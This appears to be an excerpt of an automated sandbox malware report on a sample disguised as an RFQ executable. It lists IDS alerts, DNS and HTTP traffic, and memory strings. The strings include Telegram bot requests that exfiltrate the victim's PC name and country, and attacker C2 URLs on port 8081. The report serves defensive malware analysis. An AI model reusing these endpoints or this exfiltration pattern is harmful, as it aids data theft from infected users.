                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20and%20Time:%2019/02/2025%20/%2013:04:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20067773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20and%20Time:%2019/02/2025%20/%2013:24:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20067773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                      Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49727 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49716 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49721 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49731 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49719 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49712 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49726 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49742 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49724 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49728 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49734 -> 104.21.32.1:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49714 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49722 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20and%20Time:%2019/02/2025%20/%2013:04:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20067773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20and%20Time:%2019/02/2025%20/%2013:24:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20067773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: mail.tmcksa.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 08:08:38 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 08:08:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2797945092.0000000000434000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2797945092.0000000000434000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, nDEusQ.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, nDEusQ.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.tmcksa.com
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, nDEusQ.exe.1.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1601618602.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1652559674.0000000003247000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2797945092.0000000000434000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20a
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: nDEusQ.exe, 0000000E.00000002.2800848818.0000000003197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                      Source: nDEusQ.exe, 0000000E.00000002.2800848818.0000000003188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
                      Source: nDEusQ.exe, 0000000E.00000002.2800848818.0000000003192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.00000000029AF000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.000000000304F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
